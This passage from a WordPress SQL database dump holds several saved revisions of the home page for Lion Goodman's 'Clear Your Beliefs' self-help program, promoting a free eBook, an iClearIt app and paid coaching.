style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-23 17:38:55', '2014-10-23 22:38:55', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1588, 2, '2014-10-23 17:59:40', '2014-10-23 22:59:40', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD the FREE iClearIt App</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nComplete Program\n<p style="text-align: center;"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> </strong></p>\n\nThe <em>Clear Your Beliefs</em> Program can help you:\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\nHow and Why It Works So Well\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important;margin-top: 5px ! important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are right or wrong, good or bad, or true or false.  They''re simply the tools we use to shape our reality.  Thus, the important questions are:  “What do I want to experience?", "What beliefs are creating the experiences I don''t like?"  and "What’s the best way to change my beliefs?” \n\nThis is it.  I’ve created a method that clients and students have called “the magic wand of belief change.”\n\nI''m glad you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt&lt;/em, our free app.   If you want to clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through 7 sessions of examining your beliefs, discovering what''s interfering with your life, then eliminating them, one by one. You’ll feel better, and function better. Life simply gets easier as the old stuff falls away.  The resistance and blocks that have held you back will just melt away ­­– like magic. For an even more effective journey, add coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\nDid I mention that it’s also a lot of fun? And easy?\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /><h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice. </p><p style="text-align: center;">Help your clients clear their beliefs so they can move their lives forward.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-23 17:59:40', '2014-10-23 22:59:40', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1589, 2, '2014-10-23 18:02:55', '2014-10-23 23:02:55', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD the FREE iClearIt App</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nComplete Program\n<p style="text-align: center;"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> </strong></p>\n\nThe <em>Clear Your Beliefs</em> Program can help you:\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\nHow and Why It Works So Well\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important;margin-top: 5px ! important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality. So the important questions are:  “What do I want to experience?," "What belief is creating this experiences I don''t like?"  and "What is the most effective way to change my beliefs?”\n\n<strong>This is it.</strong>  I’ve created a method that clients and students have called “the magic wand of belief change.”\n\nI''m glad you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt&lt;/em, our free app.   If you want to clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through 7 sessions of examining your beliefs, discovering what''s interfering with your life, then eliminating them, one by one. You’ll feel better, and function better. Life simply gets easier as the old stuff falls away.  The resistance and blocks that have held you back will just melt away ­­– like magic. For an even more effective journey, add coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s also a lot of fun? And easy?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /><h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice. </p><p style="text-align: center;">Help your clients clear their beliefs so they can move their lives forward.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-23 18:02:55', '2014-10-23 23:02:55', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1591, 2, '2014-10-23 18:54:28', '2014-10-23 23:54:28', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center"><strong>DOWNLOAD the FREE APP</strong></p>\n\n<p style="text-align: center;font-size: 14px;margin-bottom: 46px">Start Clearing Whatever Is In The Way Right Now!\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nComplete Program\n<p style="text-align: center;"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> </strong></p>\n\nThe <em>Clear Your Beliefs</em> Program can help you:\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\nHow and Why It Works So Well\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality. \n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method there is.</strong>  Clients and students call it <em>“The Magic Wand.”</em>\n\nI''m glad you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-23 18:54:28', '2014-10-23 23:54:28', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1590, 2, '2014-10-23 18:09:07', '2014-10-23 23:09:07', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD the FREE iClearIt App</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nComplete Program\n<p style="text-align: center;"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> </strong></p>\n\nThe <em>Clear Your Beliefs</em> Program can help you:\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\nHow and Why It Works So Well\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important;margin-top: 5px ! important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality. \n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method there is.</strong>  Clients and students call it <em>“The Magic Wand.”</em>\n\nI''m glad you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt&lt;/em, our free app.   If you want to clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through 7 sessions of examining your beliefs, discovering what''s interfering with your life, then eliminating them, one by one. You’ll feel better, and function better. Life simply gets easier as the old stuff falls away.  The resistance and blocks that have held you back will just melt away ­­– like magic. For an even more effective journey, add coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s also a lot of fun? And easy?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /><h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice. </p><p style="text-align: center;">Help your clients clear their beliefs so they can move their lives forward.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-23 18:09:07', '2014-10-23 23:09:07', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1594, 2, '2014-10-23 19:08:38', '2014-10-24 00:08:38', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD the FREE APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nComplete Program\n<p style="text-align: center;"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> </strong></p>\n\nThe <em>Clear Your Beliefs</em> Program will help you:\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\nHow and Why It Works So Well\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-23 19:08:38', '2014-10-24 00:08:38', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1593, 2, '2014-10-23 19:04:45', '2014-10-24 00:04:45', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD the FREE APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nComplete Program\n<p style="text-align: center;"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> </strong></p>\n\nThe <em>Clear Your Beliefs</em> Program will help you:\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\nHow and Why It Works So Well\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important;margin-top: 5px ! important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt&lt;/em, our free app.\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier.  The resistance and blocks that have held you back just melt away ­­– like magic.  And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy?  And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /><h3 style="text-align: center">Are you a Coach?  Therapist? Healer?  Change Agent?</h3><p style="text-align: center">Learn how to help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-23 19:04:45', '2014-10-24 00:04:45', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
